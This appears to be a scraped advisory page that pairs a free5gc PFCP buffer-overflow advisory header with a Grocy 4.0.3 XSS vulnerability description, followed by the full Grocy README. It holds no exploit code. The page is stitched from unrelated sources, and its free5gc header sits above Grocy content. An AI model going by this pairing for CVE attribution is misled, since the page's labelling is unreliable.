Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.

**free5gc Buffer Overflow vulnerability**

Moderate severity GitHub Reviewed Published Nov 16, 2023 to the GitHub Advisory Database • Updated Nov 16, 2023

GHSA-6944-6pmv-6mp2: free5gc Buffer Overflow vulnerability

Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component.

**Give it a try**

*   Public demo of the latest stable version (release branch) → https://demo.grocy.info
*   Public demo of the current development version (master branch) → https://demo-prerelease.grocy.info

**Features**

See the website → https://grocy.info

**Questions / Help / Bug Reports / Feature Requests**

*   General help and usage questions → r/grocy subreddit
*   Bug Reports and Feature Requests → Issue Tracker

_Please don't send me private messages or call me regarding anything Grocy. I check the issue tracker and the subreddit pretty much daily, but don't provide any support beyond that._

**Community contributions**

See the website for a list of community contributed Add-ons / Tools. → https://grocy.info/addons

**How to install**

> Checkout Grocy Desktop, if you want to run Grocy without having to manage a webserver just like a normal (Windows) desktop application.
> 
> Directly download the latest release - the installation is nothing more than just clicking 2 times "next".

Grocy is technically a pretty simple PHP application, so the basic notes to get it running are:

*   Unpack the latest release
*   Copy config-dist.php to data/config.php + edit to your needs
*   Ensure that the data directory is writable
*   The webserver root should point to the public directory
*   Include try_files $uri /index.php$is_args$query_string; in your location block if you use nginx
    *   Or disable URL rewriting (see the option DISABLE_URL_REWRITING in data/config.php)
*   → Default login is user admin with password admin, please change the password immediately (user menu at the top right corner)

Alternatively clone this repository (the release branch always references the latest released version) and install Composer and Yarn dependencies manually.

See the website for more installation guides and troubleshooting help. → https://grocy.info/links

**Platform support**

*   PHP 8.1 or 8.2 (with SQLite 3.34.0+)
    *   Required PHP extensions: fileinfo, pdo_sqlite, gd, ctype, json, intl, zlib, mbstring
    *   _Recommendation: Benchmark tests showed that e.g. unit conversion handling is up to 5 times faster when using a more recent (3.39.4+) SQLite version._
*   Recent Firefox, Chrome or Edge

**How to run using Docker**

See grocy/grocy-docker or linuxserver/docker-grocy for instructions.

**How to update**

*   Overwrite everything with the latest release while keeping the data directory
*   Check config-dist.php for new configuration options and add them to your data/config.php where appropriate (the default values from config-dist.php will be used for not in data/config.php defined settings)
*   Empty the data/viewcache directory
*   Visit the main route once to apply database migrations (see below)

If you run Grocy on Linux, there is also update.sh (remember to make the script executable (chmod +x update.sh) and ensure that you have unzip installed) which does exactly this and additionally creates a backup (.tgz archive) of the current installation in data/backups (backups older than 60 days will be deleted during the update).

**Localization**

Grocy is fully localizable - the default language is English (integrated into code), a German localization is always maintained by me.

You can easily help translating Grocy on Transifex if your language is incomplete or not available yet.

The default language can be set in data/config.php, e. g. Setting('DEFAULT_LOCALE', 'it'); and there is also a user setting (see the user settings page) to set a different language per user.

The pre-release demo is available for any translation which is at least 70 % complete and will pull the translations from Transifex 10 minutes past every hour, so you can have a kind of instant preview of your contributed translations. Thank you!

Also any translation which once reached a completion level of 70 % (strings resource) will be included in releases.

_RTL languages are unfortunately not yet supported._

**Motivation**

A household needs to be managed. I did this so far (almost 10 years) with my first self written software (a C# Windows forms application) and with a bunch of Excel sheets. The software was a pain to use at the end and Excel is Excel. So I searched for and tried different things for a (very) long time, nothing 100 % fitted, so this is my aim for a "complete household management"-thing. ERP your fridge!

**Things worth to know****REST API**

See the integrated Swagger UI instance on /api.

**Barcode readers & camera scanning**

Some fields (with a barcode icon above) also allow to select a value by scanning a barcode. It works best when your barcode reader prefixes every barcode with a letter which is normally not part of a item name (I use a $) and sends a TAB after a scan.

Additionally it's also possible to use your device camera to scan a barcode by using the camera button on the right side of the corresponding field (powered by Quagga2, totally offline / client-side camera stream processing, please note due to browser security restrictions, this only works when serving Grocy via a secure connection (https://)). Quick video demo: https://www.youtube.com/watch?v=Y5YH6IJFnfc

_My personal recommendation: Use a USB barcode laser scanner. They are cheap and work 1000 % better, faster, under any lighting condition and from any angle._

**Input shorthands for date fields**

For (productivity) reasons all date (and time) input (and display) fields use the ISO-8601 format regardless of localization. The following shorthands are available:

*   MMDD gets expanded to the given day on the current year, if > today, or to the given day next year, if < today, in proper notation
    *   Example: 0517 will be converted to 2023-05-17
*   YYYYMMDD gets expanded to the proper ISO-8601 notation
    *   Example: 20230417 will be converted to 2023-04-17
*   YYYYMMe or YYYYMM+ gets expanded to the end of the given month in the given year in proper notation
    *   Example: 202307e will be converted to 2023-07-31
*   [+/-]n[d/m/y] gets expanded to a date relative to today, while adding (**+**) or subtracting (**\-**) the **n**umber of **d**ays/**m**onths/**y**ears, in proper notation
    *   Example: +1m will be converted to the same day next month
*   x gets expanded to 2999-12-31 (which is an alias for "never overdue")
*   Down/up arrow keys will increase/decrease the date by 1 day
*   Right/left arrow keys will increase/decrease the date by 1 week
*   Shift + down/up arrow keys will increase/decrease the date by 1 month
*   Shift + right/left arrow keys will increase/decrease the date by 1 year

**Keyboard shorthands for buttons**

Wherever a button contains a bold highlighted letter, this is a shortcut key. Example: Button "**P** Add as new product" can be "pressed" by using the P key on your keyboard.

**Barcode lookup via external services**

Products can be directly added to the database via looking them up against external services by a barcode.

This can be done in-place using the product picker workflow "External barcode lookup (via plugin)" (the workflow dialog is displayed when entering something unknown in any product input field).

There is no plugin included for any service, see the reference implementation in data/plugins/DemoBarcodeLookupPlugin.php.

**Database migrations**

Database schema migration is automatically done when visiting the root (/) route (click on the logo in the left upper edge).

_Please note: Database migrations are supposed to work between releases, not between every commit. If you want to run the current master branch (which is the development version), you need to handle that (and maybe more) yourself._

**Disable certain features**

If you don't use certain feature sets of Grocy (for example if you don't need "Chores"), there are feature flags per major feature set to hide/disable the related UI elements (see config-dist.php).

**Adding your own CSS or JS without to have to modify the application itself**

*   When the file data/custom_js.html exists, the contents of the file will be added just before </body> (end of body) on every page
*   When the file data/custom_css.html exists, the contents of the file will be added just before </head> (end of head) on every page

**Demo mode**

When the MODE setting is set to dev, demo or prerelease, the application will work in a demo mode which means authentication is disabled and some demo data will be generated during the database schema migration (pass the query parameter nodemodata, e.g. https://grocy.example.com/?nodemodata to skip that).

**Embedded mode**

When the file embedded.txt exists, it must contain a valid and writable path which will be used as the data directory instead of data and authentication will be disabled (used in Grocy Desktop).

In embedded mode, settings can be overridden by text files in data/settingoverrides, the file name must be <SettingName>.txt (e. g. BASE_URL.txt) and the content must be the setting value (normally one single line).

**Contributing / Say Thanks**

Any help is welcome, feel free to contribute anything which comes to your mind or see https://grocy.info/#say-thanks if you just want to say thanks.

**Roadmap**

There is none, this is a hobby project. The progress of a specific bug/enhancement is always tracked in the corresponding issue, at least by commit comment references.

Milestones are used to indicate in which version the corresponding request was done (vNEXT means it's currently planned to do that for the next release).

**Screenshots****Stock overview**

**Shopping List**

**Meal Plan**

**Chores overview**

**License**

The MIT License (MIT)

CVE-2023-48200: GitHub - grocy/grocy: ERP beyond your fridge - Grocy is a web-based self-hosted groceries & household management solution for your home

Tag

#git